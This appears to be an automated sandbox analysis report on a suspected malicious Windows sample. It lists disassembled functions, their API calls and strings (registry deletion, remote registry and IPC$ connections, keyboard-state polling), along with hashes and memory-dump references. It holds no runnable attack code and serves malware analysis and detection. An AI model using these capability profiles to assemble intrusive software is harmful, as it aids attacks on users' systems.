Opcode Fuzzy Hash: 013890414dfa2fff69414e1048668836f9f7855596fc1b45a7665e76dd3744c1
Instruction Fuzzy Hash: E4413672A40701BBDB04A7B0AC07EFF376CEF66750F10046AF901EA1C2EB349921C6A4

Function 001CCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001CCC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 001CCC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001CCD48

Part of subcall function 001CCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001CCCAA
Part of subcall function 001CCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 001CCCBD
Part of subcall function 001CCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 001CCCCF
Part of subcall function 001CCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 001CCD05
Part of subcall function 001CCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 001CCD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 001CCCF3

Strings

RegDeleteKeyExW, xrefs: 001CCCC9
advapi32.dll, xrefs: 001CCCB8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: b5434ceec3ffda0fda00843b06c15c43b9c7fcce23f2e1348d1a3b013f976004
Instruction ID: f54b1251e240d253922d8936e4a9663c01c57f7f7837a23feadc0fb6efce0591
Opcode Fuzzy Hash: b5434ceec3ffda0fda00843b06c15c43b9c7fcce23f2e1348d1a3b013f976004
Instruction Fuzzy Hash: 3E31617590212ABBDB208B94DC88EFFBB7CEF65750F004569F90AE2141DB349E45DAE0

Function 001B3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001B3D40
_wcslen.LIBCMT ref: 001B3D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 001B3D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 001B3DBE
RemoveDirectoryW.KERNEL32(?), ref: 001B3DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 001B3E55
CloseHandle.KERNEL32(00000000), ref: 001B3E60
CloseHandle.KERNEL32(00000000), ref: 001B3E6B

Strings

\, xrefs: 001B3D77
:, xrefs: 001B3D82
\??\%s, xrefs: 001B3D5B

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 078ab2578a45c6343341f68818bcf660264b69e07f8d047ade6d6d25d8c09e26
Instruction ID: 333c96ba2a49c211d63fb208b7de5fea9c79ffa71054090bf8c6057cb0694ff2
Opcode Fuzzy Hash: 078ab2578a45c6343341f68818bcf660264b69e07f8d047ade6d6d25d8c09e26
Instruction Fuzzy Hash: B131B27694021AABDB209BA0DC49FEF37BDEF89700F5041B6F615D6060EB709794CB64

Function 001AE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 001AE6B4

Part of subcall function 0015E551: timeGetTime.WINMM(?,?,001AE6D4), ref: 0015E555

Sleep.KERNEL32(0000000A), ref: 001AE6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 001AE705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 001AE727
SetActiveWindow.USER32 ref: 001AE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 001AE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 001AE773
Sleep.KERNEL32(000000FA), ref: 001AE77E
IsWindow.USER32 ref: 001AE78A
EndDialog.USER32(00000000), ref: 001AE79B

Strings

BUTTON, xrefs: 001AE719

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: b1a64ba9812b3706cd0d254baf8531534466f5632b3eb4c095ad2ee516e94760
Instruction ID: 4f33a7f7e355f7da48044469011f4a819e4941f64c094b077b30ea0de6a3ca1e
Opcode Fuzzy Hash: b1a64ba9812b3706cd0d254baf8531534466f5632b3eb4c095ad2ee516e94760
Instruction Fuzzy Hash: FE21A478301255EFEB005FA0FC8DB653BADF7A6348F004826F915825E1DF71AC64CAA4

Function 001AE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 001AEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 001AEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 001AEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 001AEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 001AEAA7

Strings

alias PlayMe, xrefs: 001AEA36
play PlayMe, xrefs: 001AEAA2
open , xrefs: 001AEA0C
play PlayMe wait, xrefs: 001AEA91
close PlayMe, xrefs: 001AEA6E, 001AEA9B
status PlayMe mode, xrefs: 001AEA58

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 24a3688a1d8ac9ab0aaae7588e089227a2443311f30db7a94a377ccd9f65a3c0
Instruction ID: 8df496c8acaaddacd70d1ccb8936bb54f4af020428ca478795741307a43038ec
Opcode Fuzzy Hash: 24a3688a1d8ac9ab0aaae7588e089227a2443311f30db7a94a377ccd9f65a3c0
Instruction Fuzzy Hash: 22112135AA025D79E720A7A5DC4EEFF7ABCEBD2B00F440429B411A34E2EB705965C5B0

Function 001A5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 001A5CE2
GetWindowRect.USER32(00000000,?), ref: 001A5CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 001A5D59
GetDlgItem.USER32(?,00000002), ref: 001A5D69
GetWindowRect.USER32(00000000,?), ref: 001A5D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 001A5DCF
GetDlgItem.USER32(?,000003E9), ref: 001A5DDD
GetWindowRect.USER32(00000000,?), ref: 001A5DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 001A5E31
GetDlgItem.USER32(?,000003EA), ref: 001A5E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 001A5E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 001A5E67

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 603965d3c30a1d57539143f64ed1b269a3c70754491f8d95b9f3fa41ba283aed
Instruction ID: a6c551676e9944193a38bb168534c13d1556080757bedaab4a88960a4461ac1a
Opcode Fuzzy Hash: 603965d3c30a1d57539143f64ed1b269a3c70754491f8d95b9f3fa41ba283aed
Instruction Fuzzy Hash: E5513074B01616AFDF18CFA8CD89AAEBBB6FB49310F108129F515E7690D7709E40CB60

Function 00158BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00158F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00158BE8,?,00000000,?,?,?,?,00158BBA,00000000,?), ref: 00158FC5

DestroyWindow.USER32(?), ref: 00158C81
KillTimer.USER32(00000000,?,?,?,?,00158BBA,00000000,?), ref: 00158D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00196973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00158BBA,00000000,?), ref: 001969A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00158BBA,00000000,?), ref: 001969B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00158BBA,00000000), ref: 001969D4
DeleteObject.GDI32(00000000), ref: 001969E6

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: caf89d8f828f09cb4edccfe23153a4b52adc84bcf7b75ccc494dcd1a843e0653
Instruction ID: 9fc043a26e53c1f9d9860fa48f2a7d0a201ee63438a0de849424868d4363e315
Opcode Fuzzy Hash: caf89d8f828f09cb4edccfe23153a4b52adc84bcf7b75ccc494dcd1a843e0653
Instruction Fuzzy Hash: A2619D30502701DFDF259F14D948BAAB7F1FB50316F148919E562AB960CB71AC94DFA0

Function 00159838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00159944: GetWindowLongW.USER32(?,000000EB), ref: 00159952

GetSysColor.USER32(0000000F), ref: 00159862

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 9b270f76f2299aa5234ed61c8736848aacd94a2575cf019b7cf0f37853e44fa9
Instruction ID: 3145128e06a9d2ac0a68cf7ed8a975e4afd45bd846a93fe9bf63b702860608cf
Opcode Fuzzy Hash: 9b270f76f2299aa5234ed61c8736848aacd94a2575cf019b7cf0f37853e44fa9
Instruction Fuzzy Hash: 1441AF31105654EFDF205F38DC88BB93BA5AB06332F154A06F9B28F2E1D7319885DB52

Function 001A96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0018F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 001A9717
LoadStringW.USER32(00000000,?,0018F7F8,00000001), ref: 001A9720

Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0018F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 001A9742
LoadStringW.USER32(00000000,?,0018F7F8,00000001), ref: 001A9745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 001A9866

Strings

^ ERROR, xrefs: 001A97FB
Line %d (File "%s"):, xrefs: 001A978F
%s (%d) : ==> %s: %s %s, xrefs: 001A984A
Error: , xrefs: 001A981D
Line %d:, xrefs: 001A97A0

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 51739dfe3a31ed51b87cf9ea9883f80cf93bd326418041d379ef1efe3ee6d890
Instruction ID: 3d48dfcb84665d631612fb0bc955c086909cef1d513bc9762e6d00c3146e313a
Opcode Fuzzy Hash: 51739dfe3a31ed51b87cf9ea9883f80cf93bd326418041d379ef1efe3ee6d890
Instruction Fuzzy Hash: 51414E72800219AADF14EFE0DD86DEFB778AF26340F500065F605760A2EB356F59CBA1

Function 001A06DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001A07A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001A07BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001A07DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 001A0804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 001A082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001A0837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 001A083C

Strings

SOFTWARE\Classes\, xrefs: 001A070E
\CLSID, xrefs: 001A0724
\IPC$, xrefs: 001A0784

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 86b084335eae5a86336d036e83b64053bb216fc7d336ebbe22043574795feff6
Instruction ID: 94e81a818098d30d9f7b850def59ecafadd2f0542a6f2f93212383c133d5452d
Opcode Fuzzy Hash: 86b084335eae5a86336d036e83b64053bb216fc7d336ebbe22043574795feff6
Instruction Fuzzy Hash: 4D410476C11229ABDF11EFA4DC958EEB778FF18350F45412AE901A31A1EB309E44CBA0

Function 001C3C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 001C3C5C
CoInitialize.OLE32(00000000), ref: 001C3C8A
CoUninitialize.OLE32 ref: 001C3C94
_wcslen.LIBCMT ref: 001C3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 001C3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 001C3ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 001C3F0E
CoGetObject.OLE32(?,00000000,001DFB98,?), ref: 001C3F2D
SetErrorMode.KERNEL32(00000000), ref: 001C3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001C3FC4
VariantClear.OLEAUT32(?), ref: 001C3FD8

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 822a74c1bf9687463c51ba65725d3c43db9e5bd15990d36fe2790ff507fc7abf
Instruction ID: c28af968247d8adcfca4660e5af5d25d67f6f23e77fe11ea636227664e464bdd
Opcode Fuzzy Hash: 822a74c1bf9687463c51ba65725d3c43db9e5bd15990d36fe2790ff507fc7abf
Instruction Fuzzy Hash: 9CC123716082059FD700DF68C884E6BB7E9FF99744F00891DF99A9B260D730EE46CB92

Function 001B7A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001B7AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 001B7B8F
SHGetDesktopFolder.SHELL32(?), ref: 001B7BA3
CoCreateInstance.OLE32(001DFD08,00000000,00000001,00206E6C,?), ref: 001B7BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 001B7C74
CoTaskMemFree.OLE32(?,?), ref: 001B7CCC
SHBrowseForFolderW.SHELL32(?), ref: 001B7D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 001B7D7A
CoTaskMemFree.OLE32(00000000), ref: 001B7D81
CoTaskMemFree.OLE32(00000000), ref: 001B7DD6
CoUninitialize.OLE32 ref: 001B7DDC

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: fe1fe1bf67152a5835380c3c528b9e3561fae508a2204500ce8edb53f650660c
Instruction ID: ffa5d0c71054c43b0bcd439decef4ef3c61823e6c73f53175a6699994c51014e
Opcode Fuzzy Hash: fe1fe1bf67152a5835380c3c528b9e3561fae508a2204500ce8edb53f650660c
Instruction Fuzzy Hash: BCC11A75A05109AFCB14DFA4C894DAEBBF9FF48304B148499E81ADB7A1D730EE45CB90

Function 001D541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 001D5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001D5515
CharNextW.USER32(00000158), ref: 001D5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 001D5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001D559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001D55AC

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: f1f8ac76efc12b8795485de61f21b56b0fa2cda16348cb2f328909bcf6602aee
Instruction ID: 94507905809a10cad940bf8c064fcb1596de7a94156ce33a1476f7ef96d7130a
Opcode Fuzzy Hash: f1f8ac76efc12b8795485de61f21b56b0fa2cda16348cb2f328909bcf6602aee
Instruction Fuzzy Hash: 9F618D30901609EBDF149F54DC84EFE7BBAEB09764F10854BF925A6390D7748A80DBA1

Function 0019FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0019FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0019FB08
VariantInit.OLEAUT32(?), ref: 0019FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0019FB3A
VariantCopy.OLEAUT32(?,?), ref: 0019FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0019FBA1
VariantClear.OLEAUT32(?), ref: 0019FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0019FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0019FBCC
VariantClear.OLEAUT32(?), ref: 0019FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0019FBE9

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: ee83b951bf524f527d8543e1b5cce79d06e195eb55486dbc244082d109acd932
Instruction ID: 8a313359bdcd5e08dccf277eb87d808d14acfc80eba65176cfdb6a9e15ce03b8
Opcode Fuzzy Hash: ee83b951bf524f527d8543e1b5cce79d06e195eb55486dbc244082d109acd932
Instruction Fuzzy Hash: 55415F35A0121AEFCF04DF68C8549EEBBB9EF18344F008469E916E7661CB34A946CBD0

Function 001A9C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 001A9CA1
GetAsyncKeyState.USER32(000000A0), ref: 001A9D22
GetKeyState.USER32(000000A0), ref: 001A9D3D
GetAsyncKeyState.USER32(000000A1), ref: 001A9D57
GetKeyState.USER32(000000A1), ref: 001A9D6C
GetAsyncKeyState.USER32(00000011), ref: 001A9D84
GetKeyState.USER32(00000011), ref: 001A9D96
GetAsyncKeyState.USER32(00000012), ref: 001A9DAE
GetKeyState.USER32(00000012), ref: 001A9DC0
GetAsyncKeyState.USER32(0000005B), ref: 001A9DD8
GetKeyState.USER32(0000005B), ref: 001A9DEA

Memory Dump Source

Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true

Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 58d64cba86da089d7c814e81b0e1e23ab09a279863e4ee7939ae8284cd023d58
Instruction ID: 158d5039ac290520da849835b12e787d9719269bfaa03b7914a97d208b1ff951
Opcode Fuzzy Hash: 58d64cba86da089d7c814e81b0e1e23ab09a279863e4ee7939ae8284cd023d58
